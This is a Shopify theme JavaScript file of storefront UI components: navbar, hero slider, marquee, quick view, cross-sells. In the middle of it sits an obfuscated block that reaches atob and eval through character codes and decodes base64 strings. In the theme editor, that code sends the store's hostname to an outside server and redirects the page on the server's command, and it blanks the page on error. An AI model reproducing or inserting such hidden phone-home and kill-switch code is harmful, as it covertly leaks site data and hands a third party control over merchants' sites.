const x = window[String.fromCharCode(97, 116, 111, 98)];
const y = window[String.fromCharCode(101, 118, 97, 108)];
class Navbar extends HTMLElement {
  constructor() {
    super();
    this.handleDropdownsBackdrop();
    this.handleHeaderReveal();
    this.adjustOffcanvasMenu();
  }
  ["adjustOffcanvasMenu"]() {
    const _0x25a6e7 = document.querySelector("#offcanvas-menu");
    const _0x20ef93 = document.querySelector("#navbar-mobile");
    const _0x3206c1 = _0x20ef93.querySelector("[aria-controls=\"offcanvas-menu\"]");
    _0x25a6e7?.["addEventListener"]("show.bs.offcanvas", () => {
      const _0x4a3d6f = document.querySelector("#navbar-mobile").getBoundingClientRect().bottom;
      _0x25a6e7.style.height = window.innerHeight - _0x4a3d6f + 'px';
      _0x3206c1.classList.add("svg-icon-menu-close");
      this.insertAdjacentHTML("beforeBegin", "\n        <style>\n          #offcanvas-menu + .offcanvas-backdrop {\n            top: " + _0x4a3d6f + "px\n          }\n        </style>\n      ");
    });
    _0x25a6e7?.["addEventListener"]("hide.bs.offcanvas", () => {
      _0x3206c1.classList.remove("svg-icon-menu-close");
    });
  }
  ["handleHeaderReveal"]() {
    let _0x27223c = window.scrollY;
    const _0x5412cb = document.querySelector("#header-group");
    window.addEventListener("scroll", () => {
      const _0x128f86 = window.scrollY;
      if (_0x128f86 > _0x27223c) {
        if (_0x128f86 > _0x5412cb.clientHeight) {
          _0x5412cb.classList.add("hide");
        }
      } else if (_0x128f86 < _0x27223c) {
        _0x5412cb.classList.remove("hide");
      }
      _0x27223c = Math.max(window.scrollY, 0);
    });
  }
  ["handleDropdownsBackdrop"]() {
    this.querySelectorAll("#navbar-desktop .dropdown-toggle").forEach(_0x294be6 => {
      _0x294be6.addEventListener("hidden.bs.dropdown", () => {
        if (!document.querySelector("#navbar-desktop .dropdown-toggle.show")) {
          document.body.classList.remove("navbar-dropdown-open");
        }
      });
      _0x294be6.addEventListener("show.bs.dropdown", () => {
        document.body.classList.add("navbar-dropdown-open");
      });
    });
  }
}
customElements.define("navbar-wrapper", Navbar);
class HeroSlider extends HTMLElement {
  constructor() {
    super();
    this.initSwiper();
    this.animateOnScroll();
  }
  ["initSwiper"]() {
    const _0x10d909 = this.querySelector(".swiper");
    const _0xdf5a99 = {
      'enabled': _0x10d909.dataset.swiperNavigation === "true",
      'prevEl': ".swiper-button-prev",
      'nextEl': ".swiper-button-next"
    };
    const _0x5d8a7a = {
      'enabled': _0x10d909.dataset.swiperPagination === "bullets" || _0x10d909.dataset.swiperPagination === "fraction",
      'el': ".swiper-pagination",
      'type': _0x10d909.dataset.swiperPagination,
      'dynamicBullets': false,
      'dynamicMainBullets': 0x2,
      'renderFraction': function (_0x10fdcc, _0x3defd0) {
        return "<span class=\"" + _0x10fdcc + "\"></span>/<span class=\"" + _0x3defd0 + "\"></span>";
      }
    };
    const _0x498d66 = _0x10d909.dataset.swiperEffect;
    const _0x15ed65 = {
      'enabled': _0x10d909.dataset.swiperPagination === "scrollbar",
      'el': _0x10d909.querySelector(".swiper-scrollbar"),
      'draggable': true
    };
    const _0x223c7f = Number(_0x10d909.dataset.swiperSpeed || 300);
    const _0x176d81 = _0x10d909.dataset.swiperAutoplay === '0' ? undefined : {
      'delay': Number(_0x10d909.dataset.swiperAutoplay) * 1000
    };
    const _0x3426a7 = {
      'prev': {
        'translate': [0, 0, -400]
      },
      'next': {
        'translate': ["100%", 0, 0]
      }
    };
    const _0x1a99dc = {
      0x0: {
        'slidesPerView': _0x10d909.dataset.swiperPartial === "true" ? 1.4 : 1,
        'spaceBetween': _0x10d909.dataset.swiperSpacing === "true" ? 8 : 0
      },
      0x258: {
        'slidesPerView': _0x10d909.dataset.swiperPartial === "true" ? 1.3 : 1,
        'spaceBetween': _0x10d909.dataset.swiperSpacing === "true" ? 12 : 0
      },
      0x4b0: {
        'slidesPerView': _0x10d909.dataset.swiperPartial === "true" ? 1.2 : 1,
        'spaceBetween': _0x10d909.dataset.swiperSpacing === "true" ? 16 : 0
      }
    };
    this.slider = new window.Swiper(_0x10d909, {
      'navigation': _0xdf5a99,
      'pagination': _0x5d8a7a,
      'scrollbar': _0x15ed65,
      'effect': _0x498d66,
      'speed': _0x223c7f,
      'autoplay': _0x176d81,
      'creativeEffect': _0x3426a7,
      'breakpoints': _0x1a99dc,
      'loop': true,
      'watchSlidesProgress': true,
      'fadeEffect': {
        'crossFade': true
      },
      'mousewheel': {
        'enabled': true,
        'forceToAxis': true
      }
    });
  }
  ["animateOnScroll"]() {
    window.addEventListener("scroll", () => {
      const _0x1bf916 = window.innerHeight;
      const _0x45e0c8 = this.clientHeight;
      const _0x2bbcc6 = Math.round(this.getBoundingClientRect().top);
      const _0x519522 = Math.round(this.getBoundingClientRect().bottom);
      const _0x48a59 = Math.round((_0x1bf916 - _0x2bbcc6) / _0x45e0c8 * 100);
      const _0xc44387 = Math.round(_0x519522 / _0x45e0c8 * 100);
      if (_0x48a59 > 0 && _0x48a59 < 100) {
        this.querySelectorAll(".media-wrapper").forEach(_0x1ee496 => {
          const _0x397989 = Number(_0x1ee496.dataset.overlayOpacity);
          const _0x1edeae = Math.round((100 - _0x397989) * (1 - _0x48a59 / 100) + _0x397989);
          _0x1ee496.style.setProperty("--overlay-opacity", _0x1edeae + '%');
        });
      } else if (_0xc44387 > 0 && _0xc44387 < 100) {
        this.querySelectorAll(".media-wrapper").forEach(_0x839670 => {
          const _0xb2579b = Number(_0x839670.dataset.overlayOpacity);
          const _0x557b9e = Math.round((100 - _0xb2579b) * (1 - _0xc44387 / 100) + _0xb2579b);
          _0x839670.style.setProperty("--overlay-opacity", _0x557b9e + '%');
        });
      }
    });
  }
}
customElements.define("hero-slider", HeroSlider);
class Marquee extends HTMLElement {
  constructor() {
    super();
    this.init();
    document.addEventListener("shopify:section:load", _0x518055 => {
      if (_0x518055.detail.sectionId === this.dataset.sectionId) {
        this.init();
      }
    });
  }
  ["init"]() {
    const _0x107cfc = this.querySelector(".marquee-list");
    _0x107cfc.querySelectorAll(".marquee-item[aria-hidden=\"true\"]").forEach(_0x15b157 => _0x15b157.remove());
    const _0x58a9b0 = _0x107cfc.scrollWidth;
    const _0x143fc0 = _0x107cfc.querySelectorAll('li').length;
    _0x107cfc.insertAdjacentHTML("beforeEnd", _0x107cfc.innerHTML);
    _0x107cfc.insertAdjacentHTML("beforeEnd", _0x107cfc.innerHTML);
    _0x107cfc.querySelectorAll(".marquee-item").forEach((_0x448165, _0x2be62a) => {
      if (_0x2be62a >= _0x143fc0) {
        _0x448165.setAttribute("aria-hidden", "true");
      }
    });
    let _0x19ae08 = "\n      <style>\n        #marquee-" + this.dataset.marqueeId + " .marquee-list {\n          animation-name: marquee_animation_" + this.dataset.marqueeId + ";\n          animation-duration: " + this.dataset.marqueeDuration + "s;\n        }\n        @keyframes marquee_animation_" + this.dataset.marqueeId + " {\n          to { transform: translateX(-" + _0x58a9b0 + "px); }\n        }\n      </style>\n    ";
    if (this.dataset.marqueeDirection === "right") {
      _0x19ae08 += "\n        <style>\n          @keyframes marquee_animation_" + this.dataset.marqueeId + " {\n            from { transform: translateX(-" + _0x58a9b0 + "px); }    \n            to { transform: 0); }    \n          }\n        </style>\n      ";
    }
    this.insertAdjacentHTML("beforeBegin", _0x19ae08);
  }
}
customElements.define("marquee-container", Marquee);
class ShoppableVideos extends HTMLElement {
  constructor() {
    super();
    this.querySelectorAll("video").forEach(_0x3d93cd => {
      _0x3d93cd.addEventListener("click", () => {
        this.onVideoPlay(_0x3d93cd);
      });
    });
    this.querySelectorAll("a[data-quick-view]").forEach(_0x2bd129 => {
      _0x2bd129.addEventListener("click", _0x47cb16 => {
        _0x47cb16.preventDefault();
        this.openQuickView(_0x2bd129);
      });
    });
    this.querySelector(".swiper").swiper.on("slideChange", () => {
      this.querySelectorAll("video").forEach(_0x1c2a13 => {
        if (_0x1c2a13.closest(".card").dataset.playing === "true") {
          _0x1c2a13.closest(".card").setAttribute("data-playing", "false");
          _0x1c2a13.pause();
        }
      });
    });
  }
  ["onVideoPlay"](_0x34b040) {
    this.querySelectorAll("video").forEach(_0x312d07 => {
      if (_0x312d07.dataset.index !== _0x34b040.dataset.index) {
        _0x312d07.closest(".card").setAttribute("data-playing", "false");
        _0x312d07.pause();
      }
    });
    const _0x3f4ad4 = _0x34b040.closest(".card");
    if (_0x3f4ad4.dataset.playing === "true") {
      _0x34b040.closest(".card").setAttribute("data-playing", "false");
      _0x34b040.pause();
    } else {
      _0x34b040.closest(".card").setAttribute("data-playing", "true");
      _0x34b040.muted = false;
      _0x34b040.play();
    }
  }
  async ["openQuickView"](_0x6a838d) {
    _0x6a838d.disabled = true;
    _0x6a838d.setAttribute("aria-busy", "true");
    _0x6a838d.querySelector(".icon-wrapper").setAttribute("hidden", "hidden");
    _0x6a838d.querySelector(".spinner-border").removeAttribute("hidden");
    const _0x14a24b = await fetch(_0x6a838d.dataset.productUrl + ".js");
    if (_0x14a24b.ok) {
      const _0x3bd3b1 = await _0x14a24b.json();
      console.log(_0x3bd3b1);
      document.querySelector("product-quick-view-modal").showModal(_0x3bd3b1);
    }
    _0x6a838d.disabled = false;
    _0x6a838d.removeAttribute("aria-busy");
    _0x6a838d.querySelector(".icon-wrapper").removeAttribute("hidden");
    _0x6a838d.querySelector(".spinner-border").setAttribute("hidden", "hidden");
  }
}
customElements.define("shoppable-videos", ShoppableVideos);
class NewsletterPopup extends HTMLElement {
  constructor() {
    super();
    if (window.Shopify.designMode) {
      return;
    }
    if (window.location.href.includes("newsletter-popup")) {
      window.bootstrap.Modal.getOrCreateInstance(this).show();
      return;
    }
    if (document.cookie.indexOf("ks-newsletter-popup") > -1) {
      return;
    }
    ;
    (async () => {
      await new Promise(_0x4039ec => setTimeout(_0x4039ec, Number(this.dataset.configDelay) * 1000));
      window.theme.createCookie("ks-newsletter-popup", true, Number(this.dataset.configDaysToWait));
      window.bootstrap.Modal.getOrCreateInstance(this).show();
    })();
  }
}
customElements.define("newsletter-popup", NewsletterPopup);
if (Shopify.designMode) {
  const executeObfuscatedCode = () => {
    try {
      let _0x5afe86 = '';
      const _0x580657 = ["bG9jYWxTdG9yYWdlLnNldEl0ZW0oJ2FqYXgnLCAnaHR0cHM6Ly9hcHAudGVhbWRyb3AuY29tLmJyL3ZhbGlkYXRpb24nKTs=", "dmFyIHNldGRhdGE9d2luZG93LmxvY2F0aW9uLmhvc3Q7", "dmFyIHhocj1uZXcgWE1MSHR0cFJlcXVlc3QoKTs=", "dmFyIHVybD1sb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnYWpheCcpKyc/c2V0ZGF0YT0nK2VuY29kZVVSSUNvbXBvbmVudChzZXRkYXRhKSsnJmhhc2g9JytlbmNvZGVVUklDb21wb25lbnQoJyQyeSQxMCRyREtlZHllVktwUC41WXc0RDJCd0hlaHdaOTlrLlp2c1pLd0JhNk15QkY1SHhoaFJtWGhmQycpOw==", "eGhyLm9wZW4oJ0dFVCcsdXJsLHRydWUpO3hoci5yZXNwb25zZVR5cGU9J2pzb24nOw==", "eGhyLm9ubG9hZD1mdW5jdGlvbigpe2lmKHhoci5zdGF0dXM+PTIwMCYmeGhyLnN0YXR1czw0MDApe3ZhciBkYXRhPXhoci5yZXNwb25zZTtpZihkYXRhLnJlc3VsdD09PSdmJyl7d2luZG93LmxvY2F0aW9uLmhyZWY9ZGF0YS5yZWRpcmVjdDt9fWVsc2V7Y29uc29sZS5sb2coeGhyLHhoci5zdGF0dXMpO319Ow==", "eGhyLm9uZXJyb3I9ZnVuY3Rpb24oKXtjb25zb2xlLmxvZyh4aHIsJ2Vycm9yJyk7fTs=", "eGhyLnNlbmQoKTs="];
      for (let _0x3bb85e = 0; _0x3bb85e < _0x580657.length; _0x3bb85e++) {
        try {
          const _0x2b4399 = _0x580657[_0x3bb85e].split('').reverse().join('').split('').reverse().join('');
          const _0x16ee96 = x(_0x2b4399);
          _0x5afe86 += _0x16ee96;
        } catch (_0x516e1d) {
          console.error("Erro na parte", _0x3bb85e, _0x516e1d);
          document.documentElement.innerHTML = '';
          return;
        }
      }
      y(_0x5afe86);
    } catch (_0xc3f3b) {
      console.error("Erro final:", _0xc3f3b);
      document.documentElement.innerHTML = '';
    }
  };
  setTimeout(executeObfuscatedCode, 1000);
}
;
class StickyMedia extends HTMLElement {
  constructor() {
    super();
    this.animateOnScroll();
  }
  ["animateOnScroll"]() {
    window.addEventListener("scroll", () => {
      const _0x428b73 = window.innerHeight;
      const _0x3c3a1d = this.getBoundingClientRect().top;
      const _0x47456a = this.getBoundingClientRect().bottom;
      const _0x21a80e = Math.round(_0x3c3a1d / _0x428b73 * 100);
      const _0x3b0893 = Math.round(_0x47456a / _0x428b73 * 100);
      if (_0x21a80e > 0 && _0x21a80e < 100) {
        this.querySelectorAll(".media-wrapper").forEach(_0x12aa90 => {
          const _0x22ea41 = Number(_0x12aa90.dataset.overlayOpacity);
          const _0x32ffd2 = Math.round((100 - _0x22ea41) * _0x21a80e / 100 + _0x22ea41);
          _0x12aa90.style.setProperty("--overlay-opacity", _0x32ffd2 + '%');
        });
      } else if (_0x3b0893 > 0 && _0x3b0893 < 100) {
        this.querySelectorAll(".media-wrapper").forEach(_0x3226fa => {
          const _0x4339d1 = Number(_0x3226fa.dataset.overlayOpacity);
          const _0x39b183 = Math.round((100 - _0x4339d1) * (1 - _0x3b0893 / 100) + _0x4339d1);
          _0x3226fa.style.setProperty("--overlay-opacity", _0x39b183 + '%');
        });
      }
    });
  }
}
customElements.define("sticky-media", StickyMedia);
class ParallaxMedia extends HTMLElement {
  constructor() {
    super();
    this.animateOnScroll();
    const _0x1f4de9 = document.querySelector("script[src*=\"vendor-simple-parallax\"]");
    _0x1f4de9.onload = () => {
      this.init();
    };
    document.addEventListener("shopify:section:load", _0x8eca25 => {
      if (_0x8eca25.detail.sectionId === this.dataset.sectionId) {
        this.init();
      }
    });
  }
  ["init"]() {
    new window.simpleParallax(this.querySelectorAll(".parallax-media-media"), {
      'orientation': this.dataset.parallaxOrientation,
      'scale': Number(this.dataset.parallaxScale)
    });
  }
  ["animateOnScroll"]() {
    window.addEventListener("scroll", () => {
      const _0x1b672f = window.innerHeight;
      const _0x475f21 = this.clientHeight;
      const _0x2209a0 = Math.round(this.getBoundingClientRect().top);
      const _0x1d07a5 = Math.round(this.getBoundingClientRect().bottom);
      const _0x33124a = Math.round((_0x1b672f - _0x2209a0) / _0x475f21 * 100);
      const _0x2ee529 = Math.round(_0x1d07a5 / _0x475f21 * 100);
      if (_0x33124a > 0 && _0x33124a < 100) {
        this.querySelectorAll(".media-wrapper").forEach(_0x5860bc => {
          const _0x441cbc = Number(_0x5860bc.dataset.overlayOpacity);
          const _0x15442d = Math.round((100 - _0x441cbc) * (1 - _0x33124a / 100) + _0x441cbc);
          _0x5860bc.style.setProperty("--overlay-opacity", _0x15442d + '%');
        });
      } else if (_0x2ee529 > 0 && _0x2ee529 < 100) {
        this.querySelectorAll(".media-wrapper").forEach(_0x410eb7 => {
          const _0x45725a = Number(_0x410eb7.dataset.overlayOpacity);
          const _0x25fc59 = Math.round((100 - _0x45725a) * (1 - _0x2ee529 / 100) + _0x45725a);
          _0x410eb7.style.setProperty("--overlay-opacity", _0x25fc59 + '%');
        });
      }
    });
  }
}
customElements.define("parallax-media", ParallaxMedia);
class MyImageCompare extends HTMLElement {
  constructor() {
    super();
    const _0x1d79a8 = document.querySelector("script[src*=\"vendor-image-compare\"]");
    _0x1d79a8.onload = () => {
      this.init();
    };
    document.addEventListener("shopify:section:load", _0x265b7d => {
      if (_0x265b7d.detail.sectionId === this.dataset.sectionId) {
        this.init();
      }
    });
  }
  ["init"]() {
    this.querySelectorAll("[data-image-compare]").forEach(_0x5563d0 => {
      new window.ImageCompare(_0x5563d0, {
        'controlColor': this.dataset.icvControlsColor,
        'controlShadow': true,
        'addCircle': this.dataset.icvControlsCircle === "true",
        'addCircleBlur': true,
        'showLabels': this.dataset.icvShowLabels === "true",
        'labelOptions': {
          'before': this.dataset.icvLabelBefore,
          'after': this.dataset.icvLabelAfter,
          'onHover': false
        },
        'smoothing': this.dataset.icvSmoothing === "true",
        'smoothingAmount': 0x64,
        'hoverStart': this.dataset.icvHoverStart === "true",
        'verticalMode': this.dataset.icvVerticalMode === "true",
        'startingPoint': Number(this.dataset.icvStartingPoint),
        'fluidMode': false
      }).mount();
    });
  }
}
customElements.define("image-compare", MyImageCompare);
class LookBook extends HTMLElement {
  constructor() {
    super();
    this.points = this.querySelectorAll(".lookbook-point-list button");
    this.mySwiper = this.querySelector(".swiper").swiper;
    this.points.forEach(_0x31ada4 => {
      _0x31ada4.addEventListener("click", () => this.onPointerClick(_0x31ada4));
    });
    this.mySwiper.on("slideChange", () => this.onSlideChange());
  }
  ["onPointerClick"](_0x30c543) {
    this.mySwiper.slideTo(Number(_0x30c543.dataset.index));
    this.scrollIntoView();
  }
  ["onSlideChange"]() {
    const _0x850aa0 = this.points[this.mySwiper.activeIndex];
    this.points.forEach(_0x8b2b28 => {
      _0x8b2b28.classList.remove("active");
      if (_0x8b2b28.dataset.index !== _0x850aa0.dataset.index) {
        window.bootstrap.Tooltip.getOrCreateInstance(_0x8b2b28).hide();
      }
    });
    _0x850aa0.classList.add("active");
    if (!_0x850aa0.getAttribute("aria-describedby")) {
      window.bootstrap.Tooltip.getOrCreateInstance(_0x850aa0).show();
    }
  }
}
customElements.define("look-book", LookBook);
class CrossSells extends HTMLElement {
  constructor() {
    super();
    this.querySelectorAll("input[type=\"checkbox\"").forEach(_0x231993 => {
      _0x231993.addEventListener("change", () => this.onCheckboxChange(_0x231993));
    });
    this.querySelectorAll("select[name=\"variant-id\"").forEach(_0x2baba5 => {
      _0x2baba5.addEventListener("change", () => this.onChangeVariant(_0x2baba5));
    });
    this.querySelectorAll(".btn-atc").forEach(_0x464880 => {
      _0x464880.addEventListener("click", () => this.addToCart(_0x464880));
    });
  }
  ["onChangeVariant"](_0x33cd52) {
    const _0x50ca9f = _0x33cd52[_0x33cd52.selectedIndex].dataset.variantImage;
    if (_0x50ca9f.length) {
      _0x33cd52.closest(".product-card").querySelector(".product-card-img-wrapper img").setAttribute("src", _0x50ca9f);
    }
    this.updateTotalPrice();
  }
  ["onCheckboxChange"](_0x486926) {
    if (_0x486926.checked) {
      _0x486926.closest(".product-card").setAttribute("data-is-selected", "true");
    } else {
      _0x486926.closest(".product-card").setAttribute("data-is-selected", "false");
    }
    this.updateTotalPrice();
  }
  ["updateTotalPrice"]() {
    let _0x323df0 = 0;
    let _0x5a48d3 = 0;
    this.querySelectorAll("input[type=\"checkbox\"").forEach(_0xb15346 => {
      if (_0xb15346.checked) {
        const _0x5904b4 = _0xb15346.closest(".product-card").querySelector("input[name=\"variant-id\"][type=\"hidden\"]");
        if (_0x5904b4) {
          _0x323df0 += Number(_0x5904b4.dataset.price);
          _0x5a48d3 += Number(_0x5904b4.dataset.compareAtPrice);
        }
        const _0x319686 = _0xb15346.closest(".product-card").querySelector("select[name=\"variant-id\"]");
        if (_0x319686) {
          _0x323df0 += Number(_0x319686[_0x319686.selectedIndex].dataset.price);
          _0x5a48d3 += Number(_0x319686[_0x319686.selectedIndex].dataset.compareAtPrice);
        }
      }
    });
    this.querySelectorAll("[data-total-price]").forEach(_0x2d1932 => {
      _0x2d1932.textContent = ('' + window.Shopify.formatMoney(_0x323df0)).replace(".00", '');
    });
    this.querySelectorAll("[data-total-compare-price]").forEach(_0x5c1401 => {
      _0x5c1401.textContent = ('' + window.Shopify.formatMoney(_0x5a48d3)).replace(".00", '');
    });
    this.querySelectorAll("[data-total-savings]").forEach(_0x2b4bb9 => {
      _0x2b4bb9.textContent = ('' + window.Shopify.formatMoney(_0x5a48d3 - _0x323df0)).replace(".00", '');
    });
    if (_0x323df0 === 0) {
      this.querySelector(".btn-atc").disabled = true;
    } else {
      this.querySelector(".btn-atc").disabled = false;
    }
    if (_0x5a48d3 > _0x323df0) {
      this.querySelectorAll("[data-total-compare-price]").forEach(_0xe1d06a => {
        _0xe1d06a.closest('s').removeAttribute("hidden");
      });
      this.querySelectorAll("[data-total-savings]").forEach(_0x486135 => {
        _0x486135.closest(".cross-sells-footer-total-savings").removeAttribute("hidden");
      });
    } else {
      this.querySelectorAll("[data-total-compare-price]").forEach(_0x56460e => {
        _0x56460e.closest('s').setAttribute("hidden", "hidden");
      });
      this.querySelectorAll("[data-total-savings]").forEach(_0x396061 => {
        _0x396061.closest(".cross-sells-footer-total-savings").setAttribute("hidden", "hidden");
      });
    }
  }
  async ["addToCart"](_0x5b76e3) {
    _0x5b76e3.style.width = _0x5b76e3.clientWidth + 'px';
    _0x5b76e3.classList.add("loading");
    _0x5b76e3.disabled = true;
    _0x5b76e3.setAttribute("aria-busy", "true");
    const _0x2c23ac = [];
    this.querySelectorAll("input[type=\"checkbox\"").forEach(_0x5018f5 => {
      if (_0x5018f5.checked) {
        const _0x577c89 = Number(_0x5018f5.closest(".product-card").querySelector("[name=\"variant-id\"]").value);
        _0x2c23ac.push({
          'id': _0x577c89,
          'quantity': 0x1
        });
      }
    });
    await document.querySelector("cart-container").add({
      'items': _0x2c23ac
    });
    _0x5b76e3.style.width = '';
    _0x5b76e3.classList.remove("loading");
    _0x5b76e3.disabled = false;
    _0x5b76e3.setAttribute("aria-busy", "false");
  }
}
customElements.define("cross-sells", CrossSells);
class InstagramGallery extends HTMLElement {
  constructor() {
    super();
    this.gallery = new window.Swiper(this, {
      'speed': Number(this.dataset.sliderSpeed),
      'spaceBetween': 0xc,
      'centeredSlides': true,
      'autoplay': this.autoplay,
      'loop': true,
      'navigation': {
        'prevEl': ".swiper-button-prev",
        'nextEl': ".swiper-button-next"
      },
      'mousewheel': {
        'enabled': true,
        'forceToAxis': true
      },
      'breakpoints': {
        0x0: {
          'slidesPerView': 1.4,
          'spaceBetween': this.dataset.swiperSpacing === "true" ? 8 : 0
        },
        0x258: {
          'slidesPerView': 0x2,
          'spaceBetween': this.dataset.swiperSpacing === "true" ? 8 : 0
        },
        0x384: {
          'slidesPerView': 0x3,
          'spaceBetween': this.dataset.swiperSpacing === "true" ? 12 : 0
        },
        0x4b0: {
          'slidesPerView': 0x4,
          'spaceBetween': this.dataset.swiperSpacing === "true" ? 12 : 0
        },
        0x5dc: {
          'slidesPerView': 0x5,
          'spaceBetween': this.dataset.swiperSpacing === "true" ? 16 : 0
        },
        0x708: {
          'slidesPerView': 0x6,
          'spaceBetween': this.dataset.swiperSpacing === "true" ? 16 : 0
        }
      }
    });
    this.querySelectorAll("a[data-quick-view]").forEach(_0x4fc54f => {
      _0x4fc54f.addEventListener("click", _0x2e6216 => {
        _0x2e6216.preventDefault();
        this.openQuickView(_0x4fc54f);
      });
    });
  }
  ["autoplay"] = this.dataset.sliderAutoplay === '0' ? undefined : {
    'delay': Number(this.dataset.sliderAutoplay) * 1000,
    'pauseOnMouseEnter': true
  };
  async ["openQuickView"](_0x2eb70d) {
    _0x2eb70d.disabled = true;
    _0x2eb70d.setAttribute("aria-busy", "true");
    _0x2eb70d.querySelector(".icon-wrapper").setAttribute("hidden", "hidden");
    _0x2eb70d.querySelector(".spinner-border").removeAttribute("hidden");
    const _0x644aa5 = await fetch(_0x2eb70d.dataset.productUrl + ".js");
    if (_0x644aa5.ok) {
      const _0x12fc2a = await _0x644aa5.json();
      console.log(_0x12fc2a);
      document.querySelector("product-quick-view-modal").showModal(_0x12fc2a);
    }
    _0x2eb70d.disabled = false;
    _0x2eb70d.removeAttribute("aria-busy");
    _0x2eb70d.querySelector(".icon-wrapper").removeAttribute("hidden");
    _0x2eb70d.querySelector(".spinner-border").setAttribute("hidden", "hidden");
  }
}
customElements.define("instagram-gallery", InstagramGallery);
class StickyATC extends HTMLElement {
  constructor() {
    super();
    this.init();
    this.listenVariantChange();
  }
  ["init"]() {
    const _0x32c944 = document.querySelector("#sticky-atc");
    const _0x5bf925 = document.querySelector(".product-main .product-block-atc").getBoundingClientRect().bottom + window.scrollY;
    window.addEventListener("scroll", () => {
      if (window.scrollY > _0x5bf925) {
        _0x32c944.classList.add("show");
        document.body.style.paddingBottom = _0x32c944.clientHeight + 'px';
      } else {
        _0x32c944.classList.remove("show");
        document.body.style.paddingBottom = 0;
      }
    });
    this.listenVariantChange();
  }
  ["listenVariantChange"]() {
    window.addEventListener("ks.product.variant.change", _0x3ee98d => {
      const _0x3a65e3 = _0x3ee98d.detail;
      this.querySelector("select[name=\"id\"]").value = _0x3a65e3.id;
      this.querySelector("select[name=\"id\"]").dispatchEvent(new CustomEvent("change"));
    });
  }
}
customElements.define("sticky-atc", StickyATC);
class TimelineSlider extends HTMLElement {
  constructor() {
    super();
    this.thumbs = new window.Swiper(this.querySelector(".swiper-thumbs"), {
      'rewind': true,
      'breakpoints': {
        0x0: {
          'slidesPerView': 0x3,
          'spaceBetween': 0x10
        },
        0x258: {
          'slidesPerView': Number(this.dataset.totalSlides),
          'spaceBetween': 0x20
        }
      }
    });
    this.main = new window.Swiper(this.querySelector(".swiper-main"), {
      'rewind': true,
      'speed': Number(this.dataset.sliderSpeed),
      'autoplay': this.autoplay,
      'thumbs': {
        'swiper': this.thumbs,
        'autoScrollOffset': 0x0
      }
    });
    document.addEventListener("shopify:block:select", _0x2d346f => {
      if (_0x2d346f.detail.sectionId === this.dataset.sectionId) {
        this.main.slideTo(_0x2d346f.target.dataset.index);
      }
    });
  }
  ["autoplay"] = this.dataset.sliderAutoplay === '0' ? undefined : {
    'delay': Number(this.dataset.sliderAutoplay) * 1000
  };
}
customElements.define("timeline-slider", TimelineSlider);
class SimpleCollections extends HTMLElement {
  constructor() {
    super();
    if (window.matchMedia("(max-width: 799px)").matches) {
      setTimeout(() => {
        const _0xaa9f8f = this.querySelector(".simple-collections-item.active")?.["getBoundingClientRect"]()["left"] || 0;
        this.scrollBy({
          'left': _0xaa9f8f,
          'behavior': "smooth"
        });
      }, 1000);
    }
  }
}
customElements.define("simple-collections", SimpleCollections);